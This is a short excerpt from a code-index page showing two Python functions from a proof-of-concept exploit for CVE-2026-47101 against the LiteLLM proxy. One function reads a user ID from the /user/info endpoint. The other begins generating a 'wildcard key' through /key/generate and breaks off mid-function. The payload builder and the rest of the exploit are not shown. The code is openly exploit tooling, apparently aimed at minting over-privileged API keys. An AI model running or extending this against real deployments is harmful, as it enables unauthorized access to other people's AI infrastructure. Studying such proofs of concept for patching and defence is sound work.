INNER CODE UNIT · Python
detect_user_id
Unclecheng-li/poc-lab · AI Infrastructure/CVE-2026-47101 LiteLLM/exploit/exploit.py:80
def detect_user_id(target: str, token: str) -> str:
url = f"{target.rstrip('/')}/user/info"
resp = api_get(url, token)
data = safe_json(resp)
if resp.status_code >= 300:
raise RuntimeError(f"Failed to read user info: HTTP {resp.status_code} {data}")
user_id = data.get("user_id") or data.get("user_id_value") or data.get("user", {}).get("user_id")
if not user_id:
raise RuntimeError(f"Cannot detect user_id from response: {data}")
return str(user_id)
def generate_wildcard_key(target: str, token: str) -> str:
url = f"{target.rstrip('/')}/key/generate"
resp = api_post(url, token, build_key_generate_payload())
data = safe_json(resp)
if resp.status_code >= 300:
raise RuntimeError(f"Wildcard key generation failed: HTTP {resp.status_code} {data}")